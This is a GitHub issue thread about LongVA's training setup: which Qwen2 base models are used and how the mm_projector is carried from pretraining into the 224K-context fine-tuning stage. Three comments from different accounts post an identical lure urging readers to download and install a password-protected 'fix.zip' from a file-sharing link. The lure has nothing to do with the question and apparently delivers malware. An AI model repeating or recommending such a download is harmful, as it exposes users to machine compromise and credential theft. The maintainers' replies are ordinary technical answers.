### ISSUE TITLE
Training Question

### ISSUE THREAD

**Issue by aniki-ly** [EvolvingLMMs-Lab/LongVA#21]
I noticed that the provided training scripts use Qwen2-7B-Instruct for pretraining and Qwen2-7B-Instruct-224K for fine-tuning, which doesn't seem to match the paper's description: "We trained our model using the same data recipe and two-stage training approach as LLaVA-1.6." Could you clarify whether this is an error or intentional?

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jzhang38** [comment]
We used the same data and two stage training approach. We used different base model.

**Comment by aniki-ly** [comment]
@jzhang38 Thank you for your prompt response. To reproduce LongVA's performance, should I pretrain with Qwen2-7B-Instruct and fine-tune with Qwen2-7B-Instruct-224K?

**Comment by kcz358** [comment]
To demonstrate the effectiveness of the direct context transfer from text to vision, we pretrain with Qwen2-7B-Instruct and directly apply the mm_projector to the Qwen2-7B-Instruct-224K without further finetuning.

**Comment by GroundMoRe** [comment]
@kcz358 Hi, may I ask how can I download the weights of the mm_projector ?

**Comment by kcz358** [comment]
@GroundMoRe You can't download it separately, but the weight can be access in the safetensors

**Comment by GroundMoRe** [comment]
> @GroundMoRe You can't download it separately, but the weight can be access in the safetensors

Hi, thanks for the quick reply! So you do not keep fine-tuning mm_projector in the long context transfer training, which means I can use the mm_projector in LongVA-7B for the step-2 fine-tuning right?

**Comment by kcz358** [comment]
We keep fine-tuning everything in the stage 2 just like what we did in the multiple versions of LLaVA-NeXT. Without further finetuning means that we pretrain the mm projector on the original Qwen-LM and then we extend the Qwen-LM to 224K for the sft stage. When we perform stage2 sft, we do not further pretrain the mm projector on the extended LM but directly use the original one
